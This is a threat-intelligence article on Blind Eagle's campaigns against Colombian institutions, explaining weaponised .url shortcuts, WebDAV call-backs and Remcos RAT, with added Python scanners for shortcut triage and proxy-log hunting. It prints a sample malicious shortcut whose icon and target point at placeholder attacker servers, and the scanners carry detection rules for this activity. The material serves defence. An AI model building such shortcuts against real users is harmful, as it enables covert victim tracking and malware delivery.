
Check Point Research (CPR) has detailed a series of ongoing, targeted campaigns by Blind Eagle (APT-C-36), one of Latin America's most dangerous threat actors, whose primary targets are Colombia's justice system, government institutions, and private organizations.
The group has shown remarkable adaptability: it adopted a new technique just six days after Microsoft patched CVE-2024-43451, which shows how quickly attackers can study a security update and build a similar method that sidesteps the fix.
This rapid adaptation highlights the growing sophistication of cyber threats and the need for proactive defenses to counter them.
CPR’s investigation uncovered more than 9,000 infections in just one week, a staggering number that underscores the efficacy of Blind Eagle’s tactics.
What makes these attacks particularly concerning is Blind Eagle’s strategic use of legitimate cloud-based services to bypass traditional security measures.
By leveraging trusted platforms like Google Drive, Dropbox, GitHub, and Bitbucket to host and distribute malware, the group makes it significantly more difficult for security tools to detect and flag their malicious activity.
Traffic to these platforms is usually allow-listed or treated as benign by security controls, which gives malicious operations a convenient cover.
Hosting payloads there also lets the group swap in new malware without reconfiguring its attack infrastructure, an operational flexibility that makes the campaigns more effective.
The attack methodology employed by Blind Eagle demonstrates sophisticated understanding of both technical vulnerabilities and human behavior.
Their approach needs almost no user interaction to reach the first stage, which blunts the value of "don't open attachments" awareness training as a defensive measure.
Simply right-clicking, deleting, or dragging the malicious file is enough to make Windows Explorer resolve the shortcut's remote icon path and send a WebDAV request, which tells the attackers that the file has been handled on a victim machine.
If the victim then opens the file, the next-stage payload is downloaded and executed, leading to full compromise of the system.
Weaponizing .URL Files for Stealthy Attacks
The most innovative aspect of Blind Eagle’s current campaign is their weaponization of .url files as a tracking and delivery mechanism.
These specially crafted shortcut files contain references to attacker-controlled WebDAV servers, enabling both passive victim tracking and active malware delivery.
The technical implementation resembles the following structure:
[InternetShortcut]
URL=file://attacker-server/document
IconFile=\\attacker-webdav\share\icon.ico
IconIndex=0
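A shortcut of that shape can be triaged before it ever reaches an Explorer window. The following is an added example, not code from CPR or from the campaign: it parses a .url file as the INI-style [InternetShortcut] block Windows expects and flags any IconFile, URL or WorkingDirectory value that points at a remote UNC or file:// host. An IconFile that resolves off-host rates highest, because Explorer fetches the icon without a click; a remote file:// target rates lower, because it is only fetched when the shortcut is opened. The two sample files and the TRUSTED_SUFFIXES allow-list are constructed for the example.

```python
"""Triage .url (InternetShortcut) files for remote icon and target references.

Added example, not CPR's or Blind Eagle's code. Sample files are constructed.
"""
import configparser
import re
from urllib.parse import urlparse

# Assumption: hosts ending in these suffixes are trusted internal file servers.
TRUSTED_SUFFIXES = (".corp.example",)

# UNC path forms Explorer understands: \\host\share, \\host@SSL\share, \\host@8080\share
UNC_RE = re.compile(r"^\\\\([^\\@]+)(?:@(?:ssl|\d+))?\\", re.IGNORECASE)


def remote_ref(value):
    """Return (host, kind) when a field points off-host, else None.

    kind is 'unc' for \\\\host\\share paths, 'file' for file://host/..., 'web' for http(s).
    Local paths (C:\\...) and file:///C:/... have no host and return None.
    """
    v = value.strip()
    if v.startswith("//"):                      # forward-slash UNC, normalise it
        v = "\\\\" + v[2:].replace("/", "\\")
    m = UNC_RE.match(v)
    if m:
        return m.group(1).lower(), "unc"
    parsed = urlparse(v)
    scheme = parsed.scheme.lower()
    if parsed.hostname and scheme == "file":
        return parsed.hostname.lower(), "file"
    if parsed.hostname and scheme in ("http", "https"):
        return parsed.hostname.lower(), "web"
    return None


def analyse_url_file(text):
    """Parse one .url file body and return a triage record with a verdict."""
    record = {"is_url_file": False, "verdict": "clean", "findings": []}
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                        # keep key case so 'IconFile' survives
    try:
        cp.read_string(text.lstrip("\ufeff"))   # tolerate a UTF-8 BOM
    except configparser.Error as exc:
        record["verdict"] = "parse_error"
        record["findings"].append({"error": str(exc)})
        return record
    if not cp.has_section("InternetShortcut"):
        return record
    record["is_url_file"] = True
    sec = cp["InternetShortcut"]
    for key in ("IconFile", "URL", "WorkingDirectory"):
        value = sec.get(key)
        if not value:
            continue
        ref = remote_ref(value)
        if ref is None:
            continue
        host, kind = ref
        if host.endswith(TRUSTED_SUFFIXES):
            continue
        if key == "IconFile" and kind in ("unc", "file"):
            severity = "high"       # fetched by Explorer on right-click/drag/delete
        elif kind in ("unc", "file"):
            severity = "medium"     # fetched when the shortcut is opened
        else:
            continue                # plain http(s) target: an ordinary web shortcut
        record["findings"].append(
            {"field": key, "host": host, "kind": kind, "severity": severity})
    if any(f["severity"] == "high" for f in record["findings"]):
        record["verdict"] = "high"
    elif record["findings"]:
        record["verdict"] = "medium"
    return record


# Constructed sample mirroring the structure described above (attacker hosts are placeholders).
MALICIOUS_URL_FILE = r"""[InternetShortcut]
URL=file://attacker-server/document
IconFile=\\attacker-webdav\share\icon.ico
IconIndex=0
"""

# Constructed benign sample: web target, icon taken from a local system library.
BENIGN_URL_FILE = r"""[InternetShortcut]
URL=https://www.example.com/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
"""

if __name__ == "__main__":
    for name, body in (("constructed-malicious.url", MALICIOUS_URL_FILE),
                       ("constructed-benign.url", BENIGN_URL_FILE)):
        print(name, analyse_url_file(body))
```

Run it over an attachment quarantine or a downloads folder; anything rated "high" is worth pulling before a user sees it. The allow-list exists because internal shortcuts legitimately point at \\fileserver\share icons, so without it the scanner is noisy on corporate desktops.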
The stealth of this method makes detection particularly challenging. Unlike traditional malware that needs a user to open an attachment or enable macros, these .url files act passively, reporting back to the attackers before they are ever opened.
This allows Blind Eagle to identify and prioritize potential victims before deploying the full malware payload.
Once executed, the final payload is Remcos RAT (Remote Access Trojan), which gives the attackers complete control over the infected machine.
After infection, Remcos can capture credentials by logging keystrokes and stealing stored passwords; modify or delete files to sabotage systems or encrypt data for ransom; establish persistence through scheduled tasks and registry modifications so it survives reboots; and exfiltrate sensitive information to command-and-control servers operated by Blind Eagle.
The speed at which Blind Eagle weaponized a newly patched vulnerability raises important questions about the evolving threat landscape.
Rather than waiting for zero-day vulnerabilities, threat actors are now closely monitoring security patches, analyzing them, and developing similar techniques that can bypass newly implemented defenses.
This shows how cybercriminals are becoming more agile, innovative, and prepared, which means security teams need to shorten their patch cycles and rely on threat prevention that catches emerging techniques rather than only signatures for known CVEs.
The sophisticated tactics employed by Blind Eagle represent a significant evolution in cyber threat methodologies.
By leveraging trusted platforms and minimizing required user interaction, these attacks bypass traditional security measures with alarming efficiency.
Organizations must respond with a layered strategy: real-time endpoint protection, email security that treats .url attachments with the same suspicion as .lnk files, and continuous monitoring of network traffic, including connections to legitimate cloud services that can be abused as malware delivery channels. Outbound WebDAV and SMB from workstations to the internet deserve particular attention: the Windows WebClient service is what issues the call-back described above, and there is rarely a business reason for it to reach external hosts, so blocking or alerting on that traffic at the perimeter removes the tracking stage of this attack chain.
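The monitoring above can start with the proxy log. This is an added example, not CPR's detection content: it parses a handful of constructed proxy records in a simple space-separated layout (timestamp, client, method, URL, status, quoted user agent) and raises two alerts, one for WebDAV traffic from the Windows WebClient (user agent Microsoft-WebDAV-MiniRedir) to any host outside an internal allow-list, and one for a file fetched from the file-hosting platforms the article names by something other than a browser. The INTERNAL_SUFFIXES allow-list, the log format and the addresses are assumptions for the example.

```python
"""Hunt proxy logs for WebDAV call-backs and non-browser downloads from file-hosting sites.

Added example, not CPR's detection logic. Log lines and hosts are constructed.
"""
import re
from urllib.parse import urlparse

# Assumption: internal hosts end in these suffixes; nothing else should be reached over WebDAV.
INTERNAL_SUFFIXES = (".corp.example",)

# File-hosting platforms the campaign is reported to use for payload hosting.
CLOUD_HOSTS = ("drive.google.com", "dropbox.com", "github.com",
               "raw.githubusercontent.com", "bitbucket.org")

# Assumed log layout: timestamp client method url status "user-agent"
LOG_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')


def in_domain(host, domains):
    """True when host equals one of domains or is a subdomain of it."""
    return any(host == d.lstrip(".") or host.endswith("." + d.lstrip("."))
               for d in domains)


def parse_line(line):
    """Turn one log line into a dict, or None if it does not match the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status, ua = m.groups()
    return {"ts": ts, "client": client, "method": method.upper(), "url": url,
            "status": int(status), "ua": ua,
            "host": (urlparse(url).hostname or "").lower()}


def classify(entry):
    """Return an alert name for a parsed entry, or None when it looks ordinary."""
    # The Windows WebClient service identifies itself with this user agent; it is
    # what Explorer uses to resolve a \\host\share icon path over HTTP.
    if entry["ua"].startswith("Microsoft-WebDAV-MiniRedir") and \
            not in_domain(entry["host"], INTERNAL_SUFFIXES):
        return "webdav_callback_external"
    # Payload staging: a GET from a file-hosting platform by a non-browser client.
    if in_domain(entry["host"], CLOUD_HOSTS) and entry["method"] == "GET" and \
            not entry["ua"].startswith("Mozilla/"):
        return "non_browser_cloud_download"
    return None


def hunt(lines):
    """Return (alert, client, host, method, url) tuples for every suspicious line."""
    alerts = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        name = classify(entry)
        if name:
            alerts.append((name, entry["client"], entry["host"],
                           entry["method"], entry["url"]))
    return alerts


# Constructed sample log: 203.0.113.7 is a documentation address standing in for an attacker host.
SAMPLE_LOG = [
    '2025-03-10T09:14:02Z 10.20.1.55 OPTIONS http://203.0.113.7/ 200 "Microsoft-WebDAV-MiniRedir/10.0.19045"',
    '2025-03-10T09:14:02Z 10.20.1.55 PROPFIND http://203.0.113.7/share/icon.ico 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"',
    '2025-03-10T09:14:40Z 10.20.1.55 GET https://raw.githubusercontent.com/acct/repo/main/update.exe 200 "Microsoft BITS/7.8"',
    '2025-03-10T09:15:01Z 10.20.1.60 GET https://github.com/ 200 "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"',
    '2025-03-10T09:15:13Z 10.20.1.60 PROPFIND http://files.corp.example/dav/ 207 "Microsoft-WebDAV-MiniRedir/10.0.19045"',
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_LOG):
        print(*alert)
```

Two caveats when moving this to real data. Explorer tries SMB on port 445 before falling back to WebDAV, so a host that also permits outbound SMB will show the call-back in firewall logs rather than the proxy; and the WebClient service only honours the system proxy for ports it routes through WinHTTP, so direct-to-internet HTTP from workstations should be logged at the firewall as well.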